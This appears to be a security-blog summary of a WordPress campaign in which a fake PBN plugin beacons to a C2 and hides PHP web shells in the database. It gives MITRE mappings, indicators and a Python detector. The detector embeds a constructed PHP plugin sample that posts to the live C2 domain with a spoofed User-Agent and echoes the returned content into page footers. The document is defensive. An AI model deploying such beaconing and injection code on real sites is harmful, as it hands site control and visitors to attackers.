WordPress PBN Plugin Drops Dual Webshells via Database Injection

Researchers uncovered a multi-stage WordPress compromise involving the fake plugin “Beloved PBN Entegrasyonu,” a live command-and-control server, and two PHP web shells hidden inside the wp_posts database table. The campaign, run by a Turkish-speaking threat actor, injected hidden backlinks for a Private Blog Network and used database-resident payloads and browser-spoofing tactics to evade detection.

Keypoints

  • The infection used three coordinated malicious components: a fake WordPress plugin, a remote C2 server, and two database-stored PHP web shells.
  • The fake plugin “Beloved PBN Entegrasyonu” was installed under wp-content/plugins/beloved-pbn/beloved-pbn.php and injected attacker-controlled HTML or JavaScript into the page footer.
  • The campaign focused on SEO manipulation through hidden backlink injection for a Private Blog Network, likely tied to gambling and adult affiliate monetization.
  • Two PHP web shells were stored as raw executable code inside wp_posts records, giving the attacker unrestricted filesystem access without authentication.
  • The malware used a Chrome 120 User-Agent spoof and referenced a FortiGuard bypass in its code to blend outbound traffic with normal browsing activity.
  • The C2 server at wp-tracker[.]com/api[.]php was active during discovery and returned tailored payloads based on infected site beacons.
  • The impact included search-ranking damage, potential Google Search Console penalties, credential theft, file replacement, cryptomining deployment, and lateral movement to other sites on the same server.

MITRE Techniques

  • [T1505.003 ] Web Shell – The attacker stored executable PHP shells inside the WordPress database to provide persistent remote control over the server (‘two PHP web shells stored directly inside the WordPress database’ and ‘complete control of the website’).
  • [T1105 ] Ingress Tool Transfer – The fake plugin contacted a remote API and received payloads to inject into pages (‘call a remote server on every page load’ and ‘returning tailored link injection payloads’).
  • [T1036 ] Masquerading – The malware used a legitimate-looking plugin name and spoofed a Chrome 120 User-Agent to blend in (‘Beloved PBN Entegrasyonu’ and ‘explicitly commented … this was a FortiGuard bypass’).
  • [T1071.001 ] Web Protocols – The plugin beaconed to an external API over HTTP/HTTPS-style web requests and used POST requests to communicate with the C2 (‘POST requests to wp-tracker[.]com/api.php’ and ‘call a remote server on every page load’).
  • [T1505 ] Server Software Component – The fake WordPress plugin acted as a persistent server-side component that injected content into webpages (‘installed at ./wp-content/plugins/beloved-pbn/beloved-pbn.php’ and ‘injected whatever HTML or JavaScript the server returned directly into the page footer’).

Indicators of Compromise

  • [File path ] malicious plugin location – wp-content/plugins/beloved-pbn/beloved-pbn.php, ./wp-content/plugins/beloved-pbn/beloved-pbn.php
  • [Domain/URL ] command-and-control and payload delivery – wp-tracker[.]com/api[.]php, destangelirvip[.]com
  • [Database table ] malicious database-resident payloads – wp_posts, records containing PHP code
  • [Plugin name ] fake WordPress plugin identifier – Beloved PBN, Beloved PBN Entegrasyonu
  • [HTTP indicator ] outbound beaconing and payload requests – POST requests to wp-tracker[.]com/api.php, Chrome 120 User-Agent header
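To sweep installed plugins against the indicators above, here is an added example (not the report's tooling) that grades one plugin file on the traits the report describes: a wp_footer hook, an outbound request from server-side code, a browser User-Agent string hard-coded in that request, the remote response echoed straight into the page, plus a direct match on the listed domains and plugin name. It goes slightly beyond the page in that a plugin with the same shape but a domain absent from the IoC list still scores as suspicious. The three plugin sources are constructed for the example and approximate the described behaviour; none is the actual malware code.

```python
import re

# Indicators from the report, re-fanged for matching.
IOC_DOMAINS = {"wp-tracker.com", "destangelirvip.com"}
IOC_PLUGIN_NAMES = ("beloved pbn",)

# Constructed plugin sources. SUSPECT_PLUGIN approximates the behaviour the report describes
# (footer hook, POST to the C2 with a Chrome 120 User-Agent, echo of whatever comes back);
# it is not the real malware. UNKNOWN_DOMAIN_PLUGIN has the same shape with a domain that is
# not on the IoC list, and BENIGN_PLUGIN is a harmless footer plugin.
SUSPECT_PLUGIN = r'''<?php
/*
Plugin Name: Beloved PBN Entegrasyonu
*/
add_action('wp_footer', 'bp_footer');
function bp_footer() {
    $r = wp_remote_post('https://wp-tracker.com/api.php', array(
        'body'    => array('site' => home_url()),
        'headers' => array('User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'),
    ));
    if (!is_wp_error($r)) { echo wp_remote_retrieve_body($r); }
}
'''
UNKNOWN_DOMAIN_PLUGIN = (
    SUSPECT_PLUGIN.replace("Beloved PBN Entegrasyonu", "Footer Widgets Pro")
    .replace("wp-tracker.com", "cdn-assets.invalid")
)
BENIGN_PLUGIN = r'''<?php
/*
Plugin Name: Site Footer Note
*/
add_action('wp_footer', function () {
    echo '<p>' . esc_html(get_option('footer_note', '')) . '</p>';
});
'''

PLUGIN_NAME = re.compile(r"Plugin Name:\s*(.+)")
FOOTER_HOOK = re.compile(r"add_action\(\s*['\"]wp_footer['\"]")
REMOTE_CALL = re.compile(r"\b(wp_remote_(?:get|post|request)|curl_exec|file_get_contents|fsockopen)\s*\(")
URL_HOST = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)
UA_HEADER = re.compile(r"User-Agent['\"]?\s*(?:=>|:)\s*['\"]([^'\"]+)", re.IGNORECASE)
ECHO_REMOTE_BODY = re.compile(r"echo\s+wp_remote_retrieve_body\s*\(")


def scan_plugin_source(src):
    """Grade one plugin file. Returns {'verdict': str, 'findings': [str], 'hosts': [str]}."""
    findings = []
    hosts = sorted({h.lower() for h in URL_HOST.findall(src)})
    name = PLUGIN_NAME.search(src)
    if name and any(n in name.group(1).lower() for n in IOC_PLUGIN_NAMES):
        findings.append("ioc_plugin_name")
    if any(h in IOC_DOMAINS for h in hosts):
        findings.append("ioc_domain")
    if FOOTER_HOOK.search(src):
        findings.append("footer_hook")
    if REMOTE_CALL.search(src):
        findings.append("remote_call")
    ua = UA_HEADER.search(src)
    if ua and "Chrome/" in ua.group(1):
        findings.append("spoofed_user_agent")   # server-side code has no reason to claim to be a browser
    if ECHO_REMOTE_BODY.search(src):
        findings.append("echo_remote_body")     # remote response printed straight into the page
    if "ioc_domain" in findings or "ioc_plugin_name" in findings:
        verdict = "malicious"
    elif "footer_hook" in findings and "remote_call" in findings and (
        "spoofed_user_agent" in findings or "echo_remote_body" in findings
    ):
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "findings": findings, "hosts": hosts}


if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT_PLUGIN), ("unknown-domain", UNKNOWN_DOMAIN_PLUGIN), ("benign", BENIGN_PLUGIN)):
        print(label, scan_plugin_source(src))
```

Run it over every file under wp-content/plugins and wp-content/mu-plugins, not just the slug named in the IoC list; the domain and plugin name are the cheapest things for the actor to change, while the footer-hook-plus-beacon-plus-echo shape is what the monetization depends on. A plugin graded suspicious this way should also be checked for the database-resident code the report pairs with it, since the plugin on disk is only one of the three components.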


Read more: https://blog.sucuri.net/2026/06/wordpress-pbn-plugin-drops-dual-webshells-via-database-injection.html